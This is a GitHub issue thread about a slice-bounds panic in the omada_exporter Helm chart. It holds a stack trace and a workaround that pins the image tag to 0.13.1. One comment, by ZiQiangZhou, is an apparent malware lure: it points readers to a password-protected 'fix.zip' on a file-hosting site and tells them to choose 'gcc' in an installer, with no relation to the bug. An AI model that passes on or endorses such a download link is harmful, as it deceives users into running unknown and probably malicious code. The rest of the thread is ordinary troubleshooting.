### ISSUE TITLE
Helm Chart Needs Updating to Latest Version

### ISSUE THREAD

**Issue by RichieRogers** [charlie-haley/omada_exporter#101]
Hi,
I'm migrating over to Kubernetes now and this error has resurfaced.

helm repo add charlie-haley http://charts.charliehaley.dev
helm repo update
helm install omada-exporter charlie-haley/omada-exporter --set omada.host=https://omada.rartec.net --set omada.username=viewer-user --set omada.password=my-password --set omada.site=Default -n monitoring

panic: runtime error: slice bounds out of range [1:0]

goroutine 1 [running]:
github.com/charlie-haley/omada_exporter/pkg/api.(*Client).getCid(0xc0000b2680)
	github.com/charlie-haley/omada_exporter@v0.13.0/pkg/api/auth.go:64 +0x1fc
github.com/charlie-haley/omada_exporter/pkg/api.Configure(0xd28700)
	github.com/charlie-haley/omada_exporter@v0.13.0/pkg/api/api.go:51 +0x8f
github.com/charlie-haley/omada_exporter/cmd.run(0xc0000c6640?)
	github.com/charlie-haley/omada_exporter@v0.13.0/cmd/exporter.go:91 +0x136
github.com/urfave/cli/v2.(*App).RunContext(0xc000082820, {0xa0ac68?, 0xc00002e040}, {0xc000022230, 0x1, 0x1})
	github.com/urfave/cli/v2@v2.3.0/app.go:322 +0x97c
github.com/urfave/cli/v2.(*App).Run(...)
	github.com/urfave/cli/v2@v2.3.0/app.go:224
github.com/charlie-haley/omada_exporter/cmd.Run()
	github.com/charlie-haley/omada_exporter@v0.13.0/cmd/exporter.go:60 +0xc25
main.main()
	github.com/charlie-haley/omada_exporter@v0.13.0/main.go:8 +0x17
panic: runtime error: slice bounds out of range [1:0]

It looks like the helm chart might not be up to date.
Can this be resolved?

Thanks,
Richie

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bitfoo1** [comment]
I see the same error.
@RichieRogers did find a workaround for this?

**Comment by RichieRogers** [comment]
> I see the same error. @RichieRogers did find a workaround for this?

Hi,
Sadly not.
I'm still hoping that the helm chart will get updated to the latest version.

Thanks,
Richie

**Comment by bitfoo1** [comment]
Hi, 
you can override the image.tag in the omada-exporter values.yml.
Just add following to your values yaml.
```yaml
image:
  tag: 0.13.1
```

I already opened a PR https://github.com/charlie-haley/charts/pull/11 to increase the appVersion in the helm chart.
